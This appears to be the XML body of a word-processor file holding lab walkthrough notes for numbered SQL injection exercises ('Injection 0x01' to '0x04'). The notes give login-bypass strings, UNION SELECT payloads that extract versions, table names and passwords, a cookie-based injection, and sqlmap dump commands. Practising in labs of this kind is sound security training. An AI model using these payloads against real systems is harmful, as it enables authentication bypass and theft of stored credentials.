                <wp:docPr id="4242" name="Group 4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5881" name="Shape 5881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2" style="width:518.25pt;height:0.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,95">
                <v:shape id="Shape 5882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27FDE229" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Injection 0x01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DA1849" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="26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3906B18" wp14:editId="26692DAB">
                <wp:extent cx="6581774" cy="1133475"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3874" name="Group 3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133475"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="1133475"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="5883" name="Shape 5883"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="111442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85775" y="276978"/>
                            <a:ext cx="1203329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DEABA" w14:textId="64DC13C7" w:rsidR="00AB6EF2" w:rsidRDefault="00303E9F">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="107"/>
                                </w:rPr>
                                <w:t>Jermey</w:t>
                              </w:r>
                              <w:r w:rsidR="00000000">
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="107"/>
                                </w:rPr>
                                <w:t>'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7"/>
                                </w:rPr>
                                <w:t>or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7"/>
                                </w:rPr>
                                <w:t>1=1#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33337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85775" y="562728"/>
                            <a:ext cx="3162485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EAA64" w14:textId="528FD53F" w:rsidR="00AB6EF2" w:rsidRDefault="00303E9F">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="107"/>
                                </w:rPr>
                                <w:t>Jeremy</w:t>
                              </w:r>
                              <w:r w:rsidR="00000000">
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="107"/>
                                </w:rPr>
                                <w:t>'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7"/>
                                </w:rPr>
                                <w:t>union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7"/>
                                </w:rPr>
                                <w:t>select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7"/>
                                </w:rPr>
                                <w:t>null,null,version()#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33337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85775" y="848478"/>
                            <a:ext cx="3965446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5E74E" w14:textId="29351A64" w:rsidR="00AB6EF2" w:rsidRDefault="00303E9F">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="106"/>
                                </w:rPr>
                                <w:t>Jermey</w:t>
                              </w:r>
                              <w:r w:rsidR="00000000">
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="106"/>
                                </w:rPr>
                                <w:t>'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6"/>
                                </w:rPr>
                                <w:t>union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6"/>
                                </w:rPr>
                                <w:t>select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6"/>
                                </w:rPr>
                                <w:t>null,null,from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6"/>
                                </w:rPr>
                                <w:t>injection0x01#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06B18" id="Group 3874" o:spid="_x0000_s1112" style="width:518.25pt;height:89.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817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">
                <v:shape id="Shape 5883" o:spid="_x0000_s1113" style="position:absolute;top:11144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270" o:spid="_x0000_s1114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" path="m23813,v3157,,6195,605,9112,1811c35843,3020,38418,4741,40651,6973v2232,2233,3953,4809,5161,7724c47021,17614,47625,20653,47625,23813v,3156,-604,6191,-1813,9106c44604,35837,42883,38413,40651,40649v-2233,2232,-4808,3953,-7726,5159c30008,47017,26970,47622,23813,47625v-3158,-3,-6196,-608,-9113,-1817c11783,44602,9207,42881,6975,40649,4742,38413,3021,35837,1813,32919,604,30004,,26969,,23813,,20653,604,17614,1813,14697,3021,11782,4742,9206,6975,6973,9207,4741,11783,3020,14700,1811,17617,602,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 271" o:spid="_x0000_s1115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" path="m47625,23813v,3156,-604,6191,-1813,9109c44604,35840,42883,38416,40650,40652v-2232,2229,-4808,3950,-7725,5159c30008,47020,26970,47625,23813,47625v-3158,,-6196,-605,-9113,-1814c11783,44602,9207,42881,6975,40652,4742,38416,3021,35843,1813,32925,604,30004,,26969,,23813,,20653,604,17614,1813,14700,3021,11779,4742,9203,6975,6973,9207,4738,11783,3017,14700,1811,17617,602,20655,,23813,v3157,,6195,602,9112,1811c35842,3017,38418,4738,40650,6973v2233,2230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272" o:spid="_x0000_s1116" style="position:absolute;left:4857;top:2769;width:1203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E4DEABA" w14:textId="64DC13C7" w:rsidR="00AB6EF2" w:rsidRDefault="00303E9F">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="107"/>
                          </w:rPr>
                          <w:t>Jermey</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000">
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="107"/>
                          </w:rPr>
                          <w:t>'</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000"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7"/>
                          </w:rPr>
                          <w:t>or</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000"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7"/>
                          </w:rPr>
                          <w:t>1=1#</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 273" o:spid="_x0000_s1117" style="position:absolute;left:3333;top:600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" path="m47625,23813v,3156,-604,6191,-1813,9112c44604,35840,42883,38413,40650,40649v-2232,2229,-4808,3950,-7725,5159c30008,47017,26970,47622,23813,47625v-3158,-3,-6196,-608,-9113,-1817c11783,44599,9207,42878,6975,40649,4742,38413,3021,35840,1813,32925,604,30004,,26969,,23813,,20653,604,17614,1813,14697,3021,11779,4742,9206,6975,6973,9207,4741,11783,3020,14700,1811,17617,605,20655,,23813,v3157,,6195,605,9112,1811c35842,3020,38418,4741,40650,6973v2233,2233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274" o:spid="_x0000_s1118" style="position:absolute;left:4857;top:5627;width:3162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A1EAA64" w14:textId="528FD53F" w:rsidR="00AB6EF2" w:rsidRDefault="00303E9F">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="107"/>
                          </w:rPr>
                          <w:t>Jeremy</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000">
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="107"/>
                          </w:rPr>
                          <w:t>'</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000"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7"/>
                          </w:rPr>
                          <w:t>union</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000"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7"/>
                          </w:rPr>
                          <w:t>select</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000"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7"/>
                          </w:rPr>
                          <w:t>null,null,version()#</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 275" o:spid="_x0000_s1119" style="position:absolute;left:3333;top:885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" path="m47625,23813v,3156,-604,6191,-1813,9109c44604,35837,42883,38413,40650,40646v-2232,2232,-4808,3953,-7725,5162c30008,47017,26970,47622,23813,47625v-3158,-3,-6196,-608,-9113,-1817c11783,44599,9207,42878,6975,40646,4742,38413,3021,35837,1813,32922,604,30004,,26969,,23813,,20653,604,17614,1813,14697,3021,11779,4742,9206,6975,6973,9207,4738,11783,3017,14700,1811,17617,602,20655,,23813,v3157,,6195,605,9112,1811c35842,3020,38418,4738,40650,6973v2233,2233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276" o:spid="_x0000_s1120" style="position:absolute;left:4857;top:8484;width:3965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78D5E74E" w14:textId="29351A64" w:rsidR="00AB6EF2" w:rsidRDefault="00303E9F">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="106"/>
                          </w:rPr>
                          <w:t>Jermey</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000">
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="106"/>
                          </w:rPr>
                          <w:t>'</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000"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6"/>
                          </w:rPr>
                          <w:t>union</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000"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6"/>
                          </w:rPr>
                          <w:t>select</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000"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6"/>
                          </w:rPr>
                          <w:t>null,null,from</w:t>
                        </w:r>
                        <w:r w:rsidR="00000000"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6"/>
                          </w:rPr>
                          <w:t>injection0x01#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E28DC0" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Injection 0x02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C64C170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2C09CA92" wp14:editId="0EAD0787">
                <wp:extent cx="6581774" cy="1704975"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3875" name="Group 3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704975"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="1704975"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="5933" name="Shape 5933"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="168592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85775" y="276978"/>
                            <a:ext cx="1452364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DA21" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="115"/>
                                </w:rPr>
                                <w:t>Cookie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5"/>
                                </w:rPr>
                                <w:t>session=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577876" y="276978"/>
                            <a:ext cx="738847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8215E" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="107"/>
                                </w:rPr>
                                <w:t>'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or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1=1#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33337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6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6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485775" y="562728"/>
                            <a:ext cx="2630455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ABE1A" w14:textId="77777777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Use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above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payload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burp.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33337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85775" y="848478"/>
                            <a:ext cx="4921968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C3CA4" w14:textId="77777777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WE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can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still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get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welcome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page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without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actual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passwd..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333375" y="11715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85775" y="1134229"/>
                            <a:ext cx="3366148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5772" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="110"/>
                                </w:rPr>
                                <w:t>'and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substring('a',1,1)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'a'#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..Substring..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Shape 288"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="333375" y="1457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85775" y="1419979"/>
                            <a:ext cx="4883648" cy="178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7C207" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000"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sqlmap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-r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request.txt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--level=2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--dump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-T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spacing w:val="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32373F"/>
                                  <w:w w:val="116"/>
                                </w:rPr>
                                <w:t>injection0x02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9CA92" id="Group 3875" o:spid="_x0000_s1121" style="width:518.25pt;height:134.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817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">
                <v:shape id="Shape 5933" o:spid="_x0000_s1122" style="position:absolute;top:16859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278" o:spid="_x0000_s1123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" path="m23813,v3157,,6195,602,9112,1811c35843,3017,38418,4738,40651,6973v2232,2230,3953,4806,5161,7724c47021,17614,47625,20653,47625,23813v,3156,-604,6191,-1813,9109c44604,35840,42883,38413,40651,40649v-2233,2229,-4808,3950,-7726,5159c30008,47017,26970,47622,23813,47625v-3158,-3,-6196,-608,-9113,-1817c11783,44599,9207,42878,6975,40649,4742,38413,3021,35840,1813,32922,604,30004,,26969,,23813,,20653,604,17614,1813,14700,3021,11779,4742,9203,6975,6973,9207,4738,11783,3017,14700,1811,17617,602,20655,,23813,xe" fillcolor="#32373f" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:shape id="Shape 279" o:spid="_x0000_s1124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" path="m47625,23813v,3156,-604,6191,-1813,9109c44604,35840,42883,38413,40650,40649v-2232,2229,-4808,3950,-7725,5159c30008,47017,26970,47622,23813,47625v-3158,-3,-6196,-608,-9113,-1817c11783,44599,9207,42878,6975,40649,4742,38413,3021,35840,1813,32922,604,30004,,26969,,23813,,20653,604,17614,1813,14694,3021,11779,4742,9206,6975,6973,9207,4741,11783,3020,14700,1811,17617,602,20655,,23813,v3157,,6195,602,9112,1811c35842,3020,38418,4741,40650,6973v2233,2233,3954,4806,5162,7721c47021,17614,47625,20653,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 280" o:spid="_x0000_s1125" style="position:absolute;left:4857;top:2769;width:1452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DF3DA21" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="115"/>
                          </w:rPr>
                          <w:t>Cookie</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="1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5"/>
                          </w:rPr>
                          <w:t>session=</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="12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126" style="position:absolute;left:15778;top:2769;width:738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6708215E" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="107"/>
                          </w:rPr>
                          <w:t>'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or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1=1#</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 282" o:spid="_x0000_s1127" style="position:absolute;left:3333;top:600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" path="m47625,23813v,3156,-604,6191,-1813,9106c44604,35837,42883,38413,40650,40646v-2232,2232,-4808,3950,-7725,5162c30008,47017,26970,47622,23813,47625v-3158,-3,-6196,-608,-9113,-1817c11783,44596,9207,42878,6975,40646,4742,38413,3021,35837,1813,32919,604,30004,,26969,,23813,,20653,604,17614,1813,14697,3021,11779,4742,9206,6975,6973,9207,4741,11783,3020,14700,1811,17617,602,20655,,23813,v3157,,6195,605,9112,1811c35842,3020,38418,4741,40650,6973v2233,2233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283" o:spid="_x0000_s1128" style="position:absolute;left:4857;top:5627;width:2630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A6ABE1A" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="109"/>
                          </w:rPr>
                          <w:t>Use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above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payload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burp.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 284" o:spid="_x0000_s1129" style="position:absolute;left:3333;top:885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" path="m47625,23813v,3156,-604,6191,-1813,9109c44604,35840,42883,38413,40650,40649v-2232,2229,-4808,3950,-7725,5159c30008,47017,26970,47622,23813,47625v-3158,-3,-6196,-608,-9113,-1817c11783,44599,9207,42878,6975,40649,4742,38413,3021,35840,1813,32922,604,30004,,26969,,23813,,20653,604,17614,1813,14694,3021,11776,4742,9203,6975,6973,9207,4741,11783,3020,14700,1811,17617,602,20655,,23813,v3157,,6195,602,9112,1811c35842,3020,38418,4741,40650,6973v2233,2230,3954,4803,5162,7721c47021,17614,47625,20653,47625,23813xe" filled="f" strokecolor="#32373f">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,47625,47625"/>
                </v:shape>
                <v:rect id="Rectangle 285" o:spid="_x0000_s1130" style="position:absolute;left:4857;top:8484;width:4922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1F5C3CA4" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="109"/>
                          </w:rPr>
                          <w:t>WE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can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still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get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welcome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page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without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actual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passwd..</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 286" o:spid="_x0000_s1131" style="position:absolute;left:3333;top:11715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" path="m47625,23813v,3156,-604,6191,-1813,9109c44604,35840,42883,38413,40650,40649v-2232,2229,-4808,3950,-7725,5159c30008,47017,26970,47622,23813,47625v-3158,-3,-6196,-608,-9113,-1817c11783,44599,9207,42878,6975,40649,4742,38413,3021,35840,1813,32922,604,30004,,26969,,23813,,20653,604,17614,1813,14697,3021,11779,4742,9203,6975,6973,9207,4738,11783,3020,14700,1811,17617,605,20655,,23813,v3157,,6195,605,9112,1811c35842,3020,38418,4738,40650,6973v2233,2230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287" o:spid="_x0000_s1132" style="position:absolute;left:4857;top:11342;width:3366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7B5C5772" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="32373F"/>
                            <w:w w:val="110"/>
                          </w:rPr>
                          <w:t>'and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substring('a',1,1)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=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'a'#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..Substring..</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 288" o:spid="_x0000_s1133" style="position:absolute;left:3333;top:1457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" path="m47625,23813v,3156,-604,6191,-1813,9109c44604,35837,42883,38413,40650,40646v-2232,2232,-4808,3953,-7725,5162c30008,47017,26970,47622,23813,47625v-3158,-3,-6196,-608,-9113,-1817c11783,44599,9207,42878,6975,40646,4742,38413,3021,35837,1813,32922,604,30004,,26969,,23813,,20653,604,17614,1813,14700,3021,11782,4742,9206,6975,6973,9207,4741,11783,3020,14700,1811,17617,605,20655,,23813,v3157,,6195,605,9112,1811c35842,3020,38418,4741,40650,6973v2233,2233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289" o:spid="_x0000_s1134" style="position:absolute;left:4857;top:14199;width:4883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B47C207" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000"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sqlmap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-r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request.txt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--level=2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--dump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-T</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:i/>
                            <w:color w:val="32373F"/>
                            <w:spacing w:val="12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32373F"/>
                            <w:w w:val="116"/>
                          </w:rPr>
                          <w:t>injection0x02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5DB27E" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="687"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Injection 0x03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15954638" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="393" w:lineRule="auto"/>
        <w:ind w:left="760" w:right="440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67A45" wp14:editId="568D73B2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>95250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-276977</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="285750" cy="1504950"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="3879" name="Group 3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1504950"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="150495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3812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3812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38125" y="11715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38125" y="1457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79" style="width:22.5pt;height:118.5pt;position:absolute;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:7.5pt;mso-position-vertical-relative:text;margin-top:-21.8093pt;" coordsize="2857,15049">
                <v:shape id="Shape 291" style="position:absolute;width:476;height:476;left:0;top:0;" coordsize="47625,47625" path="m23813,0c26970,0,30008,602,32925,1811c35843,3020,38418,4741,40651,6973c42883,9206,44604,11779,45812,14697c47021,17614,47625,20656,47625,23813c47625,26969,47021,30004,45812,32922c44604,35837,42883,38413,40651,40646c38418,42878,35843,44599,32925,45808c30008,47017,26970,47622,23813,47625c20655,47622,17617,47017,14700,45808c11783,44599,9207,42878,6975,40646c4742,38413,3021,35837,1813,32919c604,30004,0,26969,0,23813c0,20656,604,17618,1813,14700c3021,11782,4742,9206,6975,6973c9207,4741,11783,3020,14700,1811c17617,602,20655,0,23813,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="4" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#32373f"/>
                </v:shape>
                <v:shape id="Shape 292" style="position:absolute;width:476;height:476;left:2381;top:3143;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30004,45812,32925c44604,35840,42883,38413,40650,40649c38418,42878,35842,44599,32925,45808c30008,47017,26970,47622,23813,47625c20655,47622,17617,47017,14700,45808c11783,44599,9207,42878,6975,40649c4742,38413,3021,35840,1813,32925c604,30004,0,26969,0,23813c0,20653,604,17614,1813,14694c3021,11779,4742,9206,6975,6973c9207,4738,11783,3020,14700,1811c17617,605,20655,0,23813,0c26970,0,30008,605,32925,1811c35842,3020,38418,4738,40650,6973c42883,9206,44604,11779,45812,14694c47021,17614,47625,20653,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 294" style="position:absolute;width:476;height:476;left:2381;top:6000;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30004,45812,32922c44604,35837,42883,38413,40650,40646c38418,42878,35842,44599,32925,45808c30008,47017,26970,47622,23813,47625c20655,47622,17617,47017,14700,45808c11783,44599,9207,42878,6975,40646c4742,38413,3021,35837,1813,32922c604,30004,0,26969,0,23813c0,20653,604,17614,1813,14697c3021,11782,4742,9206,6975,6973c9207,4741,11783,3020,14700,1811c17617,602,20655,0,23813,0c26970,0,30008,605,32925,1811c35842,3020,38418,4741,40650,6973c42883,9206,44604,11782,45812,14697c47021,17614,47625,20653,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 296" style="position:absolute;width:476;height:476;left:2381;top:8858;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30004,45812,32922c44604,35840,42883,38413,40650,40649c38418,42878,35842,44599,32925,45808c30008,47017,26970,47622,23813,47625c20655,47622,17617,47017,14700,45808c11783,44599,9207,42878,6975,40649c4742,38413,3021,35840,1813,32922c604,30004,0,26969,0,23813c0,20653,604,17614,1813,14694c3021,11776,4742,9203,6975,6973c9207,4741,11783,3020,14700,1811c17617,602,20655,0,23813,0c26970,0,30008,602,32925,1811c35842,3020,38418,4741,40650,6973c42883,9203,44604,11776,45812,14694c47021,17614,47625,20653,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 298" style="position:absolute;width:476;height:476;left:2381;top:11715;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30004,45812,32922c44604,35840,42883,38413,40650,40649c38418,42878,35842,44599,32925,45808c30008,47017,26970,47622,23813,47625c20655,47622,17617,47017,14700,45808c11783,44599,9207,42878,6975,40649c4742,38413,3021,35840,1813,32922c604,30004,0,26969,0,23813c0,20653,604,17614,1813,14697c3021,11779,4742,9206,6975,6973c9207,4738,11783,3017,14700,1811c17617,602,20655,0,23813,0c26970,0,30008,605,32925,1811c35842,3020,38418,4738,40650,6973c42883,9206,44604,11779,45812,14697c47021,17614,47625,20653,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373f"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 300" style="position:absolute;width:476;height:476;left:2381;top:14573;" coordsize="47625,47625" path="m47625,23813c47625,26969,47021,30004,45812,32922c44604,35840,42883,38413,40650,40649c38418,42878,35842,44599,32925,45808c30008,47017,26970,47622,23813,47625c20655,47622,17617,47017,14700,45808c11783,44599,9207,42878,6975,40649c4742,38413,3021,35840,1813,32922c604,30004,0,26969,0,23813c0,20653,604,17614,1813,14700c3021,11782,4742,9206,6975,6973c9207,4741,11783,3017,14700,1811c17617,602,20655,0,23813,0c26970,0,30008,602,32925,1811c35842,3017,38418,4741,40650,6973c42883,9206,44604,11779,45812,14697c47021,17614,47625,20653,47625,23813x">
                  <v:stroke weight="0.75pt" endcap="flat" joinstyle="miter" miterlimit="4" on="true" color="#32373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32373F"/>
        </w:rPr>
        <w:t xml:space="preserve">x' or 1=1# </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>sqlmap -r req.txt -T injection0x03_users --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB39FE6" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="153"/>
        <w:ind w:left="160" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>Use the below payloads in the search bar of the lab to get the database details...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7809EDF4" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="153"/>
        <w:ind w:left="160" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="32373F"/>
        </w:rPr>
        <w:t>Tanjyoubi Sushi Rack' union select null, null, null, password from injection0x03_users#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFA9AB5" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:t>Tanjyoubi Sushi Rack' union select null,null,null, table_name from information_schema.tables#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0DEF57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0B9C4A36" wp14:editId="05D7A53B">
                <wp:extent cx="6581774" cy="19050"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3876" name="Group 3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9050"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="19050"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6069" name="Shape 6069"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="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6" style="width:518.25pt;height:1.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65817,190">
                <v:shape id="Shape 6070" style="position:absolute;width:65817;height:190;left:0;top:0;" coordsize="6581774,19050" path="m0,0l6581774,0l6581774,19050l0,19050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7DA3B16C" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Injection 0x04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDA6DC1" w14:textId="77777777" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="324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3CEA70F8" wp14:editId="08FCBE34">
                <wp:extent cx="6581774" cy="1219200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3877" name="Group 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219200"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6581774" cy="1219200"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6071" name="Shape 6071"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="111442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2" name="Shape 6072"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="12001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85775" y="276982"/>
                            <a:ext cx="2239367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CAF9" w14:textId="01C74F74" w:rsidR="00AB6EF2" w:rsidRDefault="00303E9F">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="109"/>
                                </w:rPr>
                                <w:t>Second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9"/>
                                </w:rPr>
                                <w:t>order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SQL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9"/>
                                </w:rPr>
                                <w:t>injection.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33337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85775" y="562732"/>
                            <a:ext cx="4510652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00E2D" w14:textId="67980FD0" w:rsidR="00AB6EF2" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="112"/>
                                </w:rPr>
                                <w:t>Signup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2"/>
                                </w:rPr>
                                <w:t>using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2"/>
                                </w:rPr>
                                <w:t>a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2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12"/>
                                </w:rPr>
                                <w:t>SQL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2"/>
                                </w:rPr>
                                <w:t>payload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2"/>
                                </w:rPr>
                                <w:t>(</w:t>
                              </w:r>
                              <w:r w:rsidR="00303E9F">
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="112"/>
                                </w:rPr>
                                <w:t>username</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="32373F"/>
                                  <w:w w:val="112"/>
                                </w:rPr>
                                <w:t>)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2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2"/>
                                </w:rPr>
                                <w:t>a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2"/>
                                </w:rPr>
                                <w:t>passwd.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Shape 309"/>
